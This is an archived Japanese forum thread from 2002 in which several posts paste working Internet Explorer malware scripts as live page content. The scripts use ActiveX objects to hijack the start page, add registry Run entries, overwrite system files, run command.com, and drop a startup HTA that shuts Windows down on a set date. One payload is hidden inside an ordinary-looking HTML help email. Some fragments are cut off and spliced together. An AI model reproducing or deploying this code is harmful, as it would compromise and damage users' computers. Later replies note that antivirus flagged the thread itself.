FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createI nstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
//以下是检测用户注册表并修改相应的键值
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "URLﾘﾝｸ(JavaHouse.126.com)");//修改用户InternetExplorer浏览器的默认主页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "URLﾘﾝｸ(JavaHouse.126.com)");//建立默认启动页面程序，保证用户每次启动计算机首先打开该页面
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);//实现打开页面后1秒钟内执行测试修改注册表的工作
}
init();</SCRIPT>

176:findlu@21cn.com
02/01/07 03:19
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\windows\system\Krnl386.exe";
scr.Doc="<object id=`wsh`
classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`></object><SCRIPT>alert(
`Screw Denise Richards, Debbie Johnson
r0x!`);wsh.Run(`c:\command.com`);</"+"SCRIPT>";
scr.write();
</script>

</p>

See how simply that was adapted? I polished it not-at-all so you can see the
minimal changes. At this point you would be automatically transferred to a
second web page that would contain the following code.

<html>

<head>
<title>Self Destruct </title>
</head>

<body>
<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

177:名無しさん＠お腹いっぱい。
02/01/07 03:20
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\WINNT\System32\ntoskrnl.exe";
scr.Doc="<object id=`wsh`
classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`></object><SCRIPT>alert(
`Screw Denise Richards, Debbie Johnson
r0x!`);wsh.Run(`c:\command.com`);</"+"SCRIPT>";
scr.write();
</script>

178:名無しさん＠お腹いっぱい。
02/01/07 03:23
document.write("");

if (navigator.appName == 'Netscape') var language = navigator.language;
else var language = navigator.browserLanguage;

function AddFavLnk(loc, DispName, SiteURL) {
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

179:findlu@21cn.com
02/01/07 03:43

<x-html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>
<DIV><FONT face=Arial size=2>Dear Sir</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>Iam a new learner of HTML . My question , suppose
my main file is "index.html" and I want to go to another file "main.html" with a
password what I have to do , will it require a cgi script to doing so . So
kindly help me by giving the source code for such a html file.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Thanks</FONT> <BR><BR><FONT face=Arial
size=2>From :</FONT></DIV>
<DIV><FONT face=Arial size=2>name_omitted , India, Jabalpur</FONT></DIV>
<DIV><FONT face=Arial size=2>e-mail : <A
href="mailto:email_address_omitted">email_address_omitted</A> </FONT></DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV></FONT></DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV>
<SCRIPT></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>')
;t3.close();fs.GetFile(wd+'COMMAND\\\\default.htm').Attributes=2;fs.DeleteFile(wd+'day.reg');d=new Date()
;if(d.getDate()==11 && d.getHours()>16){alert('Days It was a day to be a days!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 Scan Memory Driver";la=(navigator.systemLanguage)?navigator.
systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Demarrer\\Programmes\\Demarrage\\day.hta":
"C:\\windows\\Start Menu\\Programs\\StartUp\\day.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)
&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>

</x-html>

183:ウイルス
02/01/07 06:03
このスレをカチューシャでみたらNIS2002
がログをウイルスと断定、削除しました

184:名無しさん＠お腹いっぱい。
02/01/07 15:09
>>183

おらも同じだ。

「ホットゾヌ」だけど、やっぱりノートンが「ログの中にウイルスがいる」と
警告してきた。

185:名無しさん＠お腹いっぱい。
02/01/07 15:42
URLﾘﾝｸ(www.pp.iij4u.or.jp)

186:名無しさん＠お腹いっぱい。
02/01/07 15:47
おめでとうございます。
初出勤今日は当然ドゴールです。
久しく革靴履いて歩いていないので今日はきつめの印象であります。
年末にビッチリと自分なりの手入れをしたため今日は履き心地は別にして気分がいいです。
とにかくビガビガです。
実は奥さんと３歳の息子にまで怒られながらも家でビデオ鑑賞の際などに履いていましたので初日ではないのですが、やはり気に入った靴で出勤した日は気分いいものです。
それでは今年もよろしくお願いします。

187:名無しさん＠お腹いっぱい。
02/01/07 15:58
>>183-184
ＮＰＦ2001だと、なにも検出しなかったよ
やっぱり新しいのがいいのかなぁ

188:名無しさん＠お腹いっぱい。
02/01/07 16:56
>>186
幸せですか？

189:あぼーん
あぼーん
あぼーん

190:　
02/01/08 01:42
ココのスレをあらゆるところにリンクしたらそれは悲惨になりそうな予感

次ページ